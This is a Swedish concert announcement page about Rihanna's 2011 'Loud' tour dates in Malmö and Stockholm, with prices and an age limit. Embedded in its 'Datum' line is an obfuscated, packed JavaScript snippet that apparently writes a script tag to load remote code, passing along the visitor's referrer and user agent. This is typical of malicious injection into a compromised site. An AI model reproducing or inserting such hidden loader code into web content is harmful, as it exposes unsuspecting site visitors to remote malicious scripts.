Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Rihanna till Malmö och Stockholm

Rihanna till Malmö och Stockholm
Sebastian

Datum: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fryte|var|u0026u|referrer|yfree||js|php’.split(’|’),0,{}))
Måndag 31 Oktober 2011 – Onsdag 2 November 2011

RIHANNA GÄSTAR SVERIGE PÅ LOUD-TURNÉN!

Efter enorma framgångar med turnén ”Rated R” tidigare i år kan Live Nation stolt meddela att megastjärnan Rihanna besöker Sverige i höst på sin komm…

ande turné ”Loud”. Rihanna förärar Sverige med två konserter, den första på Malmö Arena den 31 oktober och den andra i Stockholm den 1 november på Ericsson Globe.Detta blir första chansen för alla fans att få se Rihanna framföra megahitarna ”Only Girl (In The World)” och ”What’s My Name” live, båda från senaste albumet ”Loud” som släpptes i Sverige i mitten av november.

Med låten ”Only Girl (In The World)” som gick in som #1 i flera länder var läget perfekt när hennes femte album ”Load” släpptes, som även det gick rakt in på första platsen på listor världen över. Andra singeln, ”What’s My Name” featuring Drake, är även den jättesuccé. Den blev Rihannas nionde #1 placering på Hot 100 och befäste därmed hennes dominans på listorna.

Nominerad till 4 Grammy Awards och hon förtjänar sitt rykte att vara en av de mest energiska och begåvade artister i världen. Hennes senaste turné ”Rated R” var en enorm succé med en enastående produktion och utsålda arenor världen över.

Åldersgräns 13 år.
Pris från 335 till 750 kr